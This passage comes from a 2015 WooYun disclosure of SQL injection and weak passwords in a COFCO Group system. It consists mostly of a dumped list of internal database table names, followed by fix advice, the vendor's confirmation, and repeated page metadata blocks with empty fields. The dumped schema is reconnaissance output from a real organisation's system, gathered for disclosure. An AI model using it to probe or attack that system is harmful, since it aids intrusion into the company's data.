| V_OA_FLOW_PROGRESS                 |
| V_OA_FLOW_SENDER                   |
| V_OA_FLOW_WORDFORM                 |
| V_OA_FORM_AIPSIGN                  |
| V_OA_FORM_DOC                      |
| V_OA_FORM_EDITTABLE_INFO           |
| V_OA_FORM_FIELD_FLOW               |
| V_OA_FORM_FIELD_FLOW               |
| V_OA_FORM_FIELD_LIST_DEFINE        |
| V_OA_FORM_FIELD_LIST_DEFINE        |
| V_OA_FORM_INFO                     |
| V_OA_FORM_LIST_FIELD               |
| V_OA_FORM_LIST_FIELD               |
| V_OA_FORM_SENTENCE                 |
| V_OA_FORM_SIGN                     |
| V_OA_FORM_TREE_CLASS               |
| V_OA_FORM_TREE_DATA                |
| V_OA_FROM_TREE                     |
| V_OA_HOLEDAYCARD_HISTORY           |
| V_OA_HOLEDAYCARD_HISTORY           |
| V_OA_HR_CW_LEAVE                   |
| V_OA_HR_CW_OUT                     |
| V_OA_HoledayCardContent            |
| V_OA_MEETING_REC                   |
| V_OA_MEETING_REC                   |
| V_OA_MEETING_ROOM_REGISTER         |
| V_OA_MEETING_ROOM_REGISTER         |
| V_OA_MEETING_TASK                  |
| V_OA_MESSAGE                       |
| V_OA_MONTH_TASK_SUM                |
| V_OA_NOTICE_DATA                   |
| V_OA_NOTICE_FLOW_READER            |
| V_OA_NOTICE_FLOW_READER            |
| V_OA_NOTICE_FLOW_TIMEOUT           |
| V_OA_NOTICE_INFO_H                 |
| V_OA_NOTICE_INFO_H                 |
| V_OA_NOTICE_NOTICE                 |
| V_OA_NOTICE_READ                   |
| V_OA_NOTICE_REPLY                  |
| V_OA_PROJECT_DEFINE_SELECT         |
| V_OA_PROJECT_DEFINE_SELECT         |
| V_OA_PROJECT_FLOW                  |
| V_OA_PROJECT_INFO                  |
| V_OA_PROJECT_TASK                  |
| V_OA_PROJECT_TREE                  |
| V_OA_PROJECT_ZT_TREE               |
| V_OA_QUESTIONAIRE_RESULT_SUM       |
| V_OA_QUESTIONAIRE_RESULT_SUM       |
| V_OA_QUESTIONAIRE_RESULT_SUM       |
| V_OA_QUESTIONAIRE_TITLE            |
| V_OA_REG_COMPANYDATA               |
| V_OA_REPORT_ACTIVE_INFO            |
| V_OA_REPORT_FLASH_FIELD            |
| V_OA_REPORT_FLASH_INFO             |
| V_OA_REPORT_HTML_INFO              |
| V_OA_REPORT_LIST_FIELD             |
| V_OA_REPORT_LIST_INFO              |
| V_OA_REPORT_PIC_FIELD              |
| V_OA_REPORT_PIC_INFO               |
| V_OA_RSS_TREE                      |
| V_OA_SERVER_FLOW_NOTICE            |
| V_OA_SERVER_FLOW_READER            |
| V_OA_SERVER_FLOW_SENDER            |
| V_OA_SUBFORM_FIELD_LIST            |
| V_OA_SUBFORM_FIELD_LIST            |
| V_OA_SUBFORM_INFO                  |
| V_OA_SUBFORM_VIEW_FIELD            |
| V_OA_SUBFORM_VIEW_INFO             |
| V_OA_TABLE_MANAGER_INTO            |
| V_OA_TABLE_OPERATE_INTO            |
| V_OA_TASK_DAY                      |
| V_OA_TASK_MONTH_DETAIL             |
| V_OA_TASK_MONTH_MAIN               |
| V_OA_TASK_WEEK_DETAIL              |
| V_OA_TASK_WEEK_MAIN                |
| V_OA_VOTE_FORMVIEW_INFO            |
| V_OA_VoteList                      |
| V_OA_Votes                         |
| V_fi_loginctrl_define              |
| V_mekp_Authorize_status_0          |
| V_mekp_Authorize_status_1          |
| V_mekp_ModuleList                  |
| V_mekp_PrivilegeList               |
| dtproperties                       |
| fi_loginctrl_define                |
| fi_loginctrl_ipctrl                |
| fi_media_info                      |
| fi_message_info                    |
| fi_message_reply                   |
| fi_message_type                    |
| fi_sys_bigtask                     |
| fi_sys_help                        |
| fi_sys_lic                         |
| fi_sys_parameter                   |
| fi_sys_timerclass                  |
| fi_test                            |
| fi_upload_file                     |
| fioa_sms_info                      |
| forums_BlockedIpAddresses          |
| forums_UserProfile                 |
| forums_Users                       |
| ld_pj_info                         |
| mekp_Authorize_maps                |
| mekp_Authorize_maps                |
| mekp_Comments                      |
| mekp_CommonLinkDetail              |
| mekp_CommonLinkDetail              |
| mekp_DocAttributeValue             |
| mekp_DocAttributes                 |
| mekp_DocContents                   |
| mekp_DocDraft                      |
| mekp_DocVersion                    |
| mekp_EISProductInfo                |
| mekp_EmpGuideFolder                |
| mekp_EmpGuideFolder                |
| mekp_ExpertFolder                  |
| mekp_ExpertInfo                    |
| mekp_Fields                        |
| mekp_Information_remind            |
| mekp_Information_remind            |
| mekp_IntegralBase                  |
| mekp_IntegralHonorLevel            |
| mekp_IntegralHonorLevel            |
| mekp_IntegralHonorNum              |
| mekp_IntegralInfo                  |
| mekp_IntegralRule                  |
| mekp_IntegralUser                  |
| mekp_KeywordSearchHistory          |
| mekp_LFields                       |
| mekp_LibraryColumn                 |
| mekp_LibraryColumn                 |
| mekp_LibraryDocCount               |
| mekp_LibraryDocViewCount           |
| mekp_LibraryDocYear                |
| mekp_LibraryFolder                 |
| mekp_LibraryItems                  |
| mekp_LibraryKMFolder               |
| mekp_LibraryKMRelated              |
| mekp_LibraryMechanism              |
| mekp_LibraryProFolder              |
| mekp_LibraryProfessionalFolder     |
| mekp_MessageCenterPerson           |
| mekp_MessageCenterPerson           |
| mekp_MessageCenterSendLog          |
| mekp_MessageCenterSendLog          |
| mekp_MessageCenterUser             |
| mekp_MobileConfig                  |
| mekp_MobileDingTalkMenu            |
| mekp_MobileIndexTag                |
| mekp_MobileInitTag                 |
| mekp_MobileModule                  |
| mekp_MobileModuleTag               |
| mekp_MobileWeChartBinding          |
| mekp_MobileWeChartMenu             |
| mekp_NavTreeDetail                 |
| mekp_NavTreeDetail                 |
| mekp_NewsPic                       |
| mekp_OrgActionPrivilege            |
| mekp_PortalCommonLink              |
| mekp_PortalCommonLink              |
| mekp_PortalDefaultAccess           |
| mekp_PortalGlobel                  |
| mekp_PortalNav                     |
| mekp_PortalShortCut                |
| mekp_Privilege                     |
| mekp_ProjectAssessment             |
| mekp_ProjectAssessment             |
| mekp_ProjectAttentionUser          |
| mekp_ProjectDateRule               |
| mekp_ProjectDateRuleView           |
| mekp_ProjectDoc                    |
| mekp_ProjectDocSet                 |
| mekp_ProjectFolder                 |
| mekp_ProjectGroupRole              |
| mekp_ProjectProcess                |
| mekp_ProjectResources              |
| mekp_ProjectRoleGroup              |
| mekp_ProjectRoleGroup              |
| mekp_ProjectRoleUser               |
| mekp_ProjectSummary                |
| mekp_ProjectTask                   |
| mekp_ProjectTaskView               |
| mekp_ProjectWarning                |
| mekp_ProjectWarningSend            |
| mekp_QAAnswer                      |
| mekp_QAFolderPermissions           |
| mekp_QAFolderPermissions           |
| mekp_QAFolderWF                    |
| mekp_QAParameters                  |
| mekp_QAQuestion                    |
| mekp_ReadingRecord                 |
| mekp_ScheduleAllowList             |
| mekp_ScheduleAllowList             |
| mekp_ScheduleFolder                |
| mekp_ScheduleGroup                 |
| mekp_ScheduleGroupShare            |
| mekp_ScheduleGroupUser             |
| mekp_ScheduleMessage               |
| mekp_ShortCutDetail                |
| mekp_ShortCutDetail                |
| mekp_Suggest                       |
| mekp_System                        |
| mekp_TagFolder                     |
| mekp_Tag_User                      |
| mekp_Tag_User                      |
| mekp_Temp                          |
| mekp_module_flow_Ins               |
| mekp_module_flow_define            |
| mekp_module_flow_define            |
| mekp_operation_log                 |
| mekp_v_AttriMould                  |
| mekp_v_AttriMouldSel               |
| mekp_v_AttriSelDefine              |
| mekp_v_AttriSelUse                 |
| mekp_v_AttriUse                    |
| mekp_v_Attributes                  |
| mekp_v_ProjectDateRule             |
| mekp_v_ProjectDoc                  |
| mekp_v_ProjectRoleGroupInfo        |
| mekp_v_ProjectTaskSummary          |
| mekp_v_QuestionAndFolder           |
| mekp_v_SearchInfo                  |
| mekp_v_TagAndFolder                |
| mekp_v_TagAndFolderUser            |
| mekp_v_TemplateInfo                |
| mekp_wechartmenu                   |
| oa_task_day_reply                  |
| oa_task_day_reply                  |
| oa_task_month_reply                |
| oa_task_week_reply                 |
| oa_vod_server                      |
| task_summary_config                |
| task_summary_remind                |
| temp_oa_doc_file                   |
| v_MOBILE_RowCount                  |
| v_fi_message_info_admin            |
| v_fi_message_rec_list              |
| v_fi_org_dept_emp                  |
| v_fi_org_dept_emp                  |
| v_fi_sys_alert                     |
| v_fi_sys_parameter                 |
| v_oa_project_item                  |
| v_oa_report_formsentence           |
| v_oa_vod_server                    |
+------------------------------------+

不深入了

修复方案：

过滤参数
弱口令

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-10-19 09:24

厂商回复：

收到，我们会尽快处理，多谢！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0147219

漏洞标题：中粮集团某系统漏洞打包（SQL注入/弱口令）

相关厂商：中粮集团有限公司

漏洞作者：路人甲

提交时间：2015-10-16 17:08

修复时间：2015-12-03 09:26

公开时间：2015-12-03 09:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0147219

漏洞标题：中粮集团某系统漏洞打包（SQL注入/弱口令）

相关厂商：中粮集团有限公司

漏洞作者： 路人甲

提交时间：2015-10-16 17:08

修复时间：2015-12-03 09:26

公开时间：2015-12-03 09:26

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0147219"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云